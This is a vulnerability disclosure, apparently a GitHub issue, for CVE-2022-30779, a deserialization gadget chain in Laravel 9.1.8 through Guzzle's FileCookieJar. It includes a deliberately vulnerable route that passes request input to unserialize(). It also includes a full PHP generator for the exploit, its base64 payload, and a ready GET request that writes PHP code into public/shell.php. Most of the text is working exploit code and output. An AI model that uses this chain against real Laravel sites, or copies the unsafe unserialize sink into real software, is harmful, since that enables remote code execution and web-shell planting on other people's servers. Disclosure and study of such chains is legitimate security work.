CVE-2022-30779: Laravel 9.1.8 POP chain2 · Issue #2 · 1nhann/vulns
Laravel 9.1.8, when an application passes attacker-controlled data to unserialize(), allows remote code execution via a POP chain that terminates in the __destruct() method of GuzzleHttp\Cookie\FileCookieJar (a Guzzle class shipped as a Laravel dependency). Note the precondition: a deserialization sink must exist in the application; this write-up supplies one with a deliberately vulnerable test route.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30779
Build a deliberately vulnerable route to test against (do not deploy this; it unserializes raw request input):
routes/web.php :
<?php
use Illuminate\Support\Facades\Route;
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
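// Deliberately vulnerable test route for CVE-2022-30779. It feeds attacker-
// controlled request data straight into unserialize(), which is the
// precondition the Guzzle FileCookieJar gadget chain needs. Never deploy this:
// production code should json_decode() untrusted input, or at the very least
// call unserialize($ser, ['allowed_classes' => false]) so no object (and thus
// no __destruct()) can be reconstructed from it.
Route::get('/', function (\Illuminate\Http\Request $request) {
    // The payload travels base64-encoded in the "ser" query parameter; a
    // missing parameter decodes to an empty string rather than null.
    $ser = base64_decode((string) $request->input('ser', ''));

    // Sink: the object graph is rebuilt here. FileCookieJar::__destruct() fires
    // when the unreferenced object is released, before the response is sent.
    unserialize($ser);

    return "ok";
});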
PoC generator (run with the PHP CLI; it prints the base64-encoded serialized payload):
<?php
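namespace GuzzleHttp\Cookie;

/**
 * Stand-in for GuzzleHttp\Cookie\SetCookie carrying only the `data` array.
 *
 * The original PoC wrote $this->data without declaring the property, which
 * serializes under the bare key "data" (no visibility mangling). Declaring it
 * public keeps that exact wire format while avoiding the PHP 8.2
 * dynamic-property deprecation.
 */
class SetCookie
{
    /** Mirrors the real class; never serialized (statics are skipped). */
    private static $defaults = [
        'Name'     => null,
        'Value'    => null,
        'Domain'   => null,
        'Path'     => '/',
        'Max-Age'  => null,
        'Expires'  => null,
        'Secure'   => false,
        'Discard'  => false,
        'HttpOnly' => false,
    ];

    /** @var array<string, mixed> Cookie attributes that end up in the jar file. */
    public $data = [];

    /**
     * @param string $payload PHP source smuggled through the Expires attribute;
     *                        the jar writes it verbatim into the target file.
     */
    public function __construct($payload = '<?php phpinfo();?>')
    {
        $this->data['Expires'] = $payload;
        // Kept at 0 as in the original PoC; Guzzle's persistence check
        // presumably drops cookies flagged Discard — verify against the
        // target Guzzle version.
        $this->data['Discard'] = 0;
    }
}

/**
 * Stand-in for GuzzleHttp\Cookie\CookieJar: holds the single malicious cookie.
 */
class CookieJar
{
    /** @var SetCookie[] */
    private $cookies = [];

    /** Left null; it is serialized as N; and plays no part in the chain. */
    private $strictMode;

    /**
     * @param SetCookie|null $cookie Cookie to store; defaults to the PoC cookie.
     */
    public function __construct(?SetCookie $cookie = null)
    {
        $this->cookies[] = $cookie ?? new SetCookie();
    }
}

/**
 * Stand-in for GuzzleHttp\Cookie\FileCookieJar, the class whose __destruct()
 * persists the jar to $filename on the target.
 */
class FileCookieJar extends CookieJar
{
    /** Path the target's __destruct() writes to; point it inside the web root. */
    private $filename;

    /** Set so that session cookies (no real Expires) are persisted as well. */
    private $storeSessionCookies;

    /**
     * @param string         $filename Destination file on the target host.
     * @param SetCookie|null $cookie   Cookie to embed; defaults to the PoC cookie.
     */
    public function __construct($filename = 'd:/var/www/untitled/public/shell.php', ?SetCookie $cookie = null)
    {
        parent::__construct($cookie);
        $this->filename = $filename;
        $this->storeSessionCookies = true;
    }
}

// Emit the payload; `serialize`/`base64_encode` fall back to the global
// functions from inside this namespace.
$jar = new FileCookieJar();
echo base64_encode(serialize($jar));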
Result (base64-encoded serialized FileCookieJar object):
TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9
Attack: a single GET to the test route makes unserialize() rebuild the object graph, and FileCookieJar::__destruct() then persists the jar to the configured filename, writing the Expires payload into public/shell.php.
http://127.0.0.1:1080/?ser=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9